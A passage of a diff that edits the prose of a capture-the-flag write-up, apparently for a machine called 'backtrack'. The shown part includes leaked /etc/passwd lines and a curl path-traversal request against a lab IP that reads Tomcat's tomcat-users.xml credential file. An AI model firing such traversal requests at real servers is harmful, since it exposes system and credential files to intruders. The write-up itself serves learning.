Dankeler/writeup-site/website/writeups/backtrack/writeup.md

 wilbur:x:1004:1004::/home/wilbur:/bin/bash
 ...")}}

-{{text("The payload works and we are able to view the users that exist on the server.
-We notice the <code class='bg-gray-300 rounded-md px-1'>tomcat</code> user with home directory at <code class='bg-gray-300 rounded-md px-1'>/opt/tomcat</code>.
-Tomcat users are stored in a XML file, so if we can find it we should get our first set of credentials.")}}
+{{text("The payload works, and we are able to view the users on the server.
+We notice the <code class='bg-gray-300 rounded-md px-1'>tomcat</code> user with a home directory at <code class='bg-gray-300 rounded-md px-1'>/opt/tomcat</code>.
+Tomcat users are typically stored in an XML file, so if we can find it, we should obtain our first set of credentials.")}}

-{{text("Searching for tomcat users xml file location we learn that it should be at <code class='bg-gray-300 rounded-md px-1'>/conf/tomcat-users.xml</code>.
+{{text("Searching for the location of the Tomcat users' XML file, we learn that it should be located at <code class='bg-gray-300 rounded-md px-1'>/conf/tomcat-users.xml</code>.
 Let's try to read this file.")}}

 {{console("curl --path-as-is http://10.10.156.56:8888/../../../../../../../../../../../../../../../../../../../../opt/tomcat/conf/tomcat-users.xml", "<?xml version='1.0' encoding='UTF-8'?>
 <tomcat-users xmlns='http://tomcat.apache.org/xml'